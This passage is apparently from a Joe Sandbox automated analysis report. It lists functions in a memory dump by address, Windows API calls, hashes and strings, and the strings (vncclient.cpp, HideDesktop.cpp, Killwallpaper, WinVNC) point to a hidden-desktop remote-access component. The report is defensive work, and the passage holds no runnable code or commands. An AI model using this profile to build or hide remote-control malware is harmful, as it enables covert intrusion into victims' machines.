Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
Instruction ID: 7f53170730a08dfc97d6481e237037dbe02376450cb08e8bd520760d74473f03
Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
Instruction Fuzzy Hash: C571E652A2C28298F7716B7195621FCBBA46F03784F989631EF5D0679ACD2CF491C322

Function 00007FF790C60B70 Relevance: 7.6, APIs: 5, Instructions: 107windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00007FF790C60BA4
BitBlt.GDI32 ref: 00007FF790C60CC1
SelectObject.GDI32 ref: 00007FF790C60CD3
GdiFlush.GDI32 ref: 00007FF790C60CE2
GdiFlush.GDI32 ref: 00007FF790C60D14

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: FlushObjectSelect
String ID:
API String ID: 2071645339-0
Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
Instruction ID: 8bf180a7a07ef54ff3a1d1b7d6d657cdec32fb2966fb705b30f0abf444bcc3a7
Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
Instruction Fuzzy Hash: 1E519376928A82AAE730AF35E0043AABBA0FF45744FA81136DA4D17759CF3CF540C721

Function 00007FF790CECC70 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CECC96
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CECCA1
_getptd.LIBCMT ref: 00007FF790CECCAD
_lock.LIBCMT ref: 00007FF790CECCE6
_lock.LIBCMT ref: 00007FF790CECD79

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _lock$_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 2808128820-0
Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
Instruction ID: 365eb1d9b7af76a6fc856d2c93be5534637d5a8d2c327d1e1a6509d45598a2af
Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
Instruction Fuzzy Hash: 2A419D21A2964289F724BB31A9523FAA691BF46BC4FC00135EE0D477D6DF6CF842D721

Function 00007FF790CF5D3C Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF790CF5EF7), ref: 00007FF790CF5D96
malloc.LIBCMT ref: 00007FF790CF5DFA
MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF790CF5EF7), ref: 00007FF790CF5E42
GetStringTypeW.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF790CF5EF7), ref: 00007FF790CF5E59
free.LIBCMT ref: 00007FF790CF5E6D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction ID: b12a929c49b8f9290ba8c38edbb1492aa5a3dc3cfa24597954fae53d72a688b0
Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction Fuzzy Hash: 12417F72A256818AEB20AF3598111E9A2E5FF45BA8F984231EF2D477D5DF3CF5018321

Function 00007FF790CE7A88 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7AB1
DecodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7AC1

Part of subcall function 00007FF790CF3480: _errno.LIBCMT ref: 00007FF790CF3489
Part of subcall function 00007FF790CF3480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF3494

EncodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7B3F

Part of subcall function 00007FF790CF3370: realloc.LIBCMT ref: 00007FF790CF339B
Part of subcall function 00007FF790CF3370: Sleep.KERNEL32(?,?,00000000,00007FF790CE7B2F,?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CF33B7

EncodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7B4F
EncodePointer.KERNEL32(?,?,00000000,00007FF790CE7B9D,?,?,?,?,00007FF790CE79F3), ref: 00007FF790CE7B5C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
Instruction ID: 8b23c6e2057f75f879b6971865b22dfe64f89d17dccf6ba53fda1ce489fd1fe3
Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
Instruction Fuzzy Hash: 2B21E521B2974252EA21BB32F95D0B9E3A1BF49BC0F841835CA0E47755EE7CF885C324

Function 00007FF790C5DAF0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FF790C5DB25
FreeLibrary.KERNEL32 ref: 00007FF790C5DB3F
FreeLibrary.KERNEL32 ref: 00007FF790C5DB58
DeleteCriticalSection.KERNEL32 ref: 00007FF790C5DB7E
DeleteCriticalSection.KERNEL32 ref: 00007FF790C5DB8C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection$FreeLibrary
String ID:
API String ID: 3328731263-0
Opcode ID: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
Instruction ID: df9dcb77a53add96d48bbea43b624cf14d5d124420c9620ce74714f802cfc782
Opcode Fuzzy Hash: 8efbe1f9ef3851a4ff4b1dc12ed94241d7363f7543c6192012ec118bd10c3970
Instruction Fuzzy Hash: DE214425739A81A6DA68FB34D5A42F8E360FF82754F841131C6AD033A1DF2CF5A5C321

Function 00007FF790C59390 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C593C0

Part of subcall function 00007FF790C9CC40: shutdown.WS2_32 ref: 00007FF790C9CC70
Part of subcall function 00007FF790C9CC40: closesocket.WS2_32 ref: 00007FF790C9CC7A

Strings

c, xrefs: 00007FF790C593B5
vncclient.cpp : enable/disable synced, xrefs: 00007FF790C59448
vncclient.cpp : enable update thread, xrefs: 00007FF790C5940B
vncclient.cpp : protocol enabled too many times!, xrefs: 00007FF790C593D1

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalEnterSectionclosesocketshutdown
String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
API String ID: 3339156387-1190838069
Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
Instruction ID: 4a9a8fdfdca536011bdf5dc15a3d15475b6c2d806cb5e76850be51c3b3583717
Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
Instruction Fuzzy Hash: EE212C61A38A8281EB60EF35D9402F9A3A4FF85BA4F841231D95D873E5DF3CE445C760

Function 00007FF790C47A30 Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,00007FF790C476B4), ref: 00007FF790C47A4B
SetEvent.KERNEL32(?,?,?,00007FF790C476B4), ref: 00007FF790C47A55
SetEvent.KERNEL32(?,?,?,00007FF790C476B4), ref: 00007FF790C47A5F
InitializeCriticalSection.KERNEL32(?,?,?,00007FF790C476B4), ref: 00007FF790C47A8B
InitializeCriticalSection.KERNEL32(?,?,?,00007FF790C476B4), ref: 00007FF790C47A95

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Event$CriticalInitializeSection
String ID:
API String ID: 4164307405-0
Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
Instruction ID: 057d5741a0a53eb0d737dcc1813d4922ed813e1c8cee614bdeb66e44348d8465
Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
Instruction Fuzzy Hash: E701E572524B41C2D714DF35E9840A8B3F8FB98F98B645136CA8D47768CF38D5A5C350

Function 00007FF790CEB6F0 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF790CEB6F9
_errno.LIBCMT ref: 00007FF790CEB701

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
Instruction ID: ff2fa3454342f65c21eef2ef06f81ce719d1cdb140c0357450f6f5fb0ecf463e
Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
Instruction Fuzzy Hash: E801AD62E29A4245FA253BB485513FCE1929F93B72FD25331D92D067D2CE6CF901A630

Function 00007FF790C53220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 00007FF790C5323C
sprintf.LIBCMT ref: 00007FF790C532C9

Strings

%d., xrefs: 00007FF790C532B4
IP address unavailable, xrefs: 00007FF790C5324A

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: gethostbynamesprintf
String ID: %d.$IP address unavailable
API String ID: 4032199589-2983120142
Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
Instruction ID: a37a295044eb315cc3e83d327e8501143cac8871a167bfdcf507cfe62ea50c47
Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
Instruction Fuzzy Hash: 2341C225628A8181D630EB35B8401AAF7A0FB45BF4F845331EEAE43BE5DF3CE4819710

Function 00007FF790C9A130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C9A183

Strings

Default, xrefs: 00007FF790C9A1CC

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DesktopInputOpen
String ID: Default
API String ID: 601053899-753088835
Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction ID: 5adaa5a4058e76ea5c0c92f7cfe5b3e435bf49f58b1abde77b812da3d7c92ef7
Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
Instruction Fuzzy Hash: 7C216A35A2868282EA71EB31B4553EAB3A1FF8A744FC41031DA9D47B99DF2CE514CB10

Function 00007FF790C802A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyA.USER32 ref: 00007FF790C802C5
MapVirtualKeyA.USER32 ref: 00007FF790C802F1

Strings

fake %d up, xrefs: 00007FF790C802D8
fake %d down, xrefs: 00007FF790C80305

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Virtual
String ID: fake %d down$fake %d up
API String ID: 4278518827-2496597273
Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
Instruction ID: d3e5bba2e2d452f55e96e7c1afebbba74ecff45a5320e4f87aef56c1e48cf8f0
Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
Instruction Fuzzy Hash: CA01C422F2868182E774A736A4501B9FBA2AF89744FA89435D94D033A5CE3CF446CB60

Function 00007FF790C3A550 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3A440: RegOpenKeyExA.ADVAPI32 ref: 00007FF790C3A465
Part of subcall function 00007FF790C3A440: RegQueryValueExA.ADVAPI32 ref: 00007FF790C3A49F
Part of subcall function 00007FF790C3A440: RegCloseKey.ADVAPI32 ref: 00007FF790C3A4AA

SystemParametersInfoA.USER32 ref: 00007FF790C3A594
SystemParametersInfoA.USER32 ref: 00007FF790C3A5AC

Part of subcall function 00007FF790C3A390: LoadLibraryA.KERNEL32 ref: 00007FF790C3A3A6
Part of subcall function 00007FF790C3A390: LoadLibraryA.KERNEL32 ref: 00007FF790C3A3CB
Part of subcall function 00007FF790C3A390: GetProcAddress.KERNEL32 ref: 00007FF790C3A3E3
Part of subcall function 00007FF790C3A390: FreeLibrary.KERNEL32 ref: 00007FF790C3A407

Strings

HideDesktop.cpp : Killwallpaper %i %i, xrefs: 00007FF790C3A5C1
HideDesktop.cpp : Killwallpaper %i, xrefs: 00007FF790C3A55B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
API String ID: 542764273-2415377678
Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction ID: 2dbecd1f2dc6b717ca81889c199e66582465952ca811133d5aec8bfadc2f0991
Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
Instruction Fuzzy Hash: 1D01F7B5A3854396EA60BB30E8006F5B761BF95309FC06036D80D127A1DE3CF61ACBB1

Function 00007FF790C9A220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

FindWindowExA.USER32 ref: 00007FF790C9A23F
GetWindowThreadProcessId.USER32 ref: 00007FF790C9A259
GetCurrentProcessId.KERNEL32 ref: 00007FF790C9A25F

Strings

WinVNC Tray Icon, xrefs: 00007FF790C9A230

Memory Dump Source

